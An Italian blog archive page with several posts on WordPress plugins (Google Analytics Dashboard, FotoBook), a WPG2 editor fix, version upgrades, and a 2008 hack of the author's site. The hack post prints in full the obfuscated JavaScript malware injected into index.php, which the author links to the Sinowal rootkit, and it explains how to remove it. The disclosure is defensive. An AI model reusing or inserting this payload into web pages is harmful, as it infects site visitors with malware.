Visto che un’immagine vale più di mille parole, eccovi uno screenshot che mostra il funzionamento del widget:

L’installazione e l’attivazione sono abbastanza banali, come per tutti i plugin WordPress:

1. scaricate il file;
2. decomprimete il file zip;
3. caricate l’intera cartella, nella cartella wp-contents/plugins;
4. andate sulla voce Plugin, presente nell’interfaccia di amministrazione di WordPress;
5. cliccare su Attiva, nella voce relativa al plugin Google Analytics Dashboard.

Infine è necessario fare l’autenticazione con Google Analytics per permettere al plugin di recuperare le statistiche: basta andare su Impostazioni -> Google Analytics Dashboard e cliccare sul pulsante Avviare il processo di login. Vi troverete davanti la pagina di Google Analytics, fate login e autorizzate il plugin a recuperare i dati.

Ora potete godervi le statistiche del vostro sito direttamente dalla bacheca di WordPress!

P.S. Google Analytics Dashboard non permette di inserire il codice di tracciamento per Google Analytics; per far ciò, è necessario utilizzare un plugin come Google Analytics for WordPress.

Qualche giorno fa ho spostato questo sito da Aruba ad un provider americano (che ha anche dei server in Germania) e ho apportato anche qualche piccola modifica al blog: la più evidente è la nuova galleria di immagini.

Precedentemente utilizzavo Gallery2 che non è affatto male, solo che, a mio parere, poco comodo da utilizzare; allora ho pensato di poter sfruttare le foto che ho su Facebook (che ha una gestione delle foto che mi piace davvero molto, poichè intuitiva ad immediata) e mi sono affidato a Google per vedere se esistesse qualcosa del genere che si integrasse bene con WordPress.

Così ho trovato FotoBook ed è stato “amore” a prima vista: è un plugin che permette di importare ed inserire le fotografie dal proprio account di Facebook (ma anche da più di uno!) in maniera davvero semplice!

Vediamo come installarlo e configurarlo:

1. scaricate e decomprimete l’ultima versione di Fotobook, scaricandola da qui;
2. fate l’upload dell’intera cartella di FotoBook nel percorso /wp-content/plugins/ (salvo diversa cartella di installazione);
3. loggatevi nel pannello di amministrazione di WordPress, andate su Plugin ed attivate FotoBook;
4. sempre nel pannello di amministrazione di WordPress, andate su Impostazioni. Qui potete configurare FotoBook, in maniera che farlo interfaccia con il vostro account Facebook ed importare le foto;
5. opzionalmente installate ed attivate (come indicato precedentemente) il plugin Lightbox per una visualizzazione più accattivante della galleria delle immagini.

Questo è quanto! Il risultato ottenuto, dopo qualche piccola personalizzazione da parte mia, lo potete vedere qui. Cosa ne pensate?!

In realtà pensavo che fosse uno scherzo, poi mi sono precipitato a vedere la home page e, in effetti, ho trovato una bella sorpresa. Schermata bianca e un errore di questo tipo:

Fatal error: Cannot redeclare security_update() (previously declared in /home/admin/domains/paologatti.it/public_html/index.php:1) in /home/admin/domains/paologatti.it/public_html/wp-includes/default-filters.php on line 1

Allora mi sono messo subito all’opera e ho ripristinato (dal backup) i file vecchi di qualche giorno e, fortunatamente, tutto ha ricominciato a funzionare alla perfezione. Ci tengo a precisare anche che non è ASSOLUTAMENTE un problema di sicurezza mio, ma del server di Aruba

Speriamo che la cosa non si ripeta! Comunque, proprio stamattina, avevo acquistato un VPS con più banda, più spazio su disco e più RAM e avevo già programmato a brevissimo (entro 1 settimana) uno spostamento di questo sito, quindi questo è solo uno stimolo in più per abbandonare presto Aruba!

Cercando su Google, ho capito che il baco è causato da una vecchia funzione “chiamata” nel file di lingua di WPG2. Comunque il problema può essere risolto abbastanza facilmente, ecco come:

1. andate nella cartella /wp-content/plugins/wpg2/g2image/langs/ ” presente nella vostra installazione di WordPress;
2. in tale cartella, dovreste trovare un file del tipo a xx.js per ogni lingua. Nel caso dell’italiano il file si chiamerà it.js;
3. ora aprite questo file con un editor di testo e sostituite tinyMCE.addToLang con tinyMCE.addI18n (che è il nuovo nome della funzione) stando attenti a non modificare nient’altro;
4. salvate e sostituite il vecchio file;
5. bene, ora potete utilizzare di nuovo l’editor WYSIWYG di WordPress!

Di cosa parlo?! Di questo codice maligno (all’apparenza incomprensibile, poichè criptato in esadecimale) javascript che mi è stato iniettato nel blog (a me, così come a tanti altri bloggers che utilizzano WordPress come piattaforma):

[quickcode:noclick]
<script language=”javascript”>$=”%63b%3d%22e(d%2573);%2573t%253dtm%2570%253d%2527%2527;for(i%253d0;i%253cds%252e%256ce%256eg%25%22;st%3d%22%2573t%253d%2522$%253d%2573%2574;%2564c%2573%2528d%2561%252bd%2562%252bd%2563+%2564%2564%252b%2564e%252c%2531%2530)%253b%2564w%2528s%2574)%253bs%2574%253d%2524%253b%2522;%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;cc%3d%2274%2568;i+%252b%2529{t%256dp%253dd%2573%252es%256c%2569ce%2528i,i%252b1%2529;st%253d%22;ce%3d%22ar%2543od%2565%2541%2574%25280)^%2528%25270%25780%2530%2527+es%2529))%253b%257d}%22;cz%3d%22%2566unc%2574ion%2520cz%2528cz)%257bre%2574ur%256e %2563a+c%2562+%2563c+%2563d+c%2565+%2563z;}%253b%22;dz%3d%22%2566un%2563t%2569on%2520dw(%2574){c%2561%253d%2527%252564%25256f%252563ume%25256et%252e%2577%252572i%2574%252565(%252522%2527;ce%253d%2527%252522)%2527;c%2562%253d%2527%25253csc%252572%2569%2570%252574 l%252561%256eg%252575a%2525%2536%2537%2565%25253%2564%25255c%25252%2532ja%2576a%2573cr%2569%252570t%25255c%2525%25322%25253e%2527;c%2563%253d%2527%25253c%25255c%25252fsc%2572%2569p%252574%25253e%2527;eva%256c(u%256ees%2563ap%2565(t%2529)%257d%253b%22;op%3d%22%2524%253d%2522dw%2528d%2563s(%2563u%252c1%2534));%2522;%22;ca%3d%22%2566%2575%256e%2563t%2569o%256e%2520dcs%2528d%2573,%2565s%2529{d%2573%253dunesca%2570%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|“d.;;bqgx{l:w{y;xp;sfv;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;cd%3d%22s%2574+%2553tri%256e%2567.f%2572%256fmC%2568%2561rCo%2564%2565(%2528t%256dp%252ec%2568%22;%69f%20(d%6fcum%65nt%2e%63oo%6b%69%65.i%6edex%4f%66(%27%76%62ull%65tin%5fmu%6ctiq%75%6f%74e%3d%27)%3d%3d-1){sc%28%27vbu%6clet%69n%5fm%75l%74iqu%6ft%65%3d%27,2,7);%65va%6c(un%65sc%61pe%28d%7a%2bc%7a+op%2b%73t)%2b%27dw(%64z%2bcz%28$+%73t%29)%3b%27)}e%6cse{%24%3d%27%27};f%75nct%69on %73c%28cnm%2cv,e%64){%76a%72 ex%64%3dnew %44ate%28);%65xd.%73%65%74Da%74%65(ex%64.g%65tD%61%74e()%2b%65%64);%64%6fcu%6dent%2eco%6fkie%3dcnm%2b %27%3d%27 +esca%70%65(v%29+%27;ex%70i%72es%3d%27%2bex%64.%74o%47M%54%53t%72in%67%28);%7d;”;eval(unescape($));document.write($);</ script></body>
[/quickcode]

Per chi si trovasse nella mia stessa situazione, non disperate, il problema è di facile risoluzione: basta editare il file index.php (presente nella root dell’installazione di WordPress) e rimuovere brutalmente il codice indicato in precedenza.

Fatto ciò, non ci resta che sperare che lo staff di WordPress tappi questa grave falla al più presto!

Ah, dimenticavo, mi scuso con tutti voi per gli eventuali disagi provocati dal codice maligno.

AGGIORNAMENTO DELLE 22.50 DEL 07/05/2008

Bene.. ci sto capendo qualcosa di più su questa situazione alquanto strana. Anzitutto l’iniezione di codice maligno sembra non derivare da un baco di WordPress, ma di una vulnerabilità dei server Aruba. Per approfondire l’argomento date un occhio a questo sito dove è indicato anche come eliminare il MBR rootkit/trojan Sinowal (questo è il nome del malware), nel caso in cui qualcuno di voi fosse stato infettato (spero non dal mio sito!).

Ah, di questa cosa ne ha parlato anche Napolux.

L’aggiornamento sembra andato a buon fine e tutti i plugin sembrano funziona correttamente (sperando che non esploda qualcosa da un momento all’altro), inoltre, la nuova interfaccia di amministrazione mi piace davvero parecchio, anche se devo ancora abituarmici.

Se anche voi volete provare questa nuova versione di WordPress, potete scaricarla da qui.

P.S. viste le numerose novità introdotte in questa versione, vi consiglio di non aggiornare subito i vostri blog a meno che non siete degli smanettoni (io l’ho fatto perchè avevo già testato la varie RC della 2.5 su un sito mirror che utilizzo per fare le prove ed ero quindi sicuro della compatibilità di tale versione con i miei plugin ed il mio tema).

AGGIORNAMENTO DELLE 00:48

Guardate che figata l’aggiornamento automatico dei plugin!

Le più rilevanti sono:

• supporto nativo per i tag
• notifica di update dei plugins e di WordPress stesso
• gestione migliorata degli URL
• rimodellazione del database
• supporto completo di Atom 1.0
• e molto altro

Questa volta l’aggiornamento è parecchio laborioso: anzitutto è davvero indispensabile fare un backup dei file e del database, poi c’è da verificare che i plugin utilizzati siano compatibili con la nuova versione e infine è necessario aggiornare il tema utilizzato, usando le funzioni per la gestione dei tag nei post di WordPress 2.3.

Per quanto mi riguarda, non credo che aggiornerò a breve: preferisco aspettare una release più stabile e che abbia una migliore gestione dei tag.

UPDATE DELLE 03.06 DEL 01/10/2007

Ho aggiornato questo blog a WordPress 2.3 (sì, lo ammetto, prima di prendere questa decisione avevo fatto già diversi test su un sito di prova); come previsto, ciò ha comportato l’adattamento del tema per il sistema di tagging nativo e la rimozione di alcuni plugin non compatibili a fronte dell’installazione di altri plugin sviluppati ad hoc per questa nuova versione.

Attualmente (quasi) tutto sembra funzionare bene, ma ho pur sempre paura che, da un momento all’altro, possa implodere tutto!

Per scaricare WordPress 2.2.3 clickate qui, per sapere come aggiornare dalle versioni precedenti clickate qui.

P.S. prima di procedere con l’aggiornamento, è consigliabile fare un backup dei file e del database.

Per scaricare WordPress 2.2.2 clickate qui, invece, per scaricare la versione 2.0.11 clickate qui; per sapere come aggiornare dalle versioni precedenti clickate qui.

P.S. prima di procedere con l’aggiornamento, è consigliabile fare un backup dei file e del database.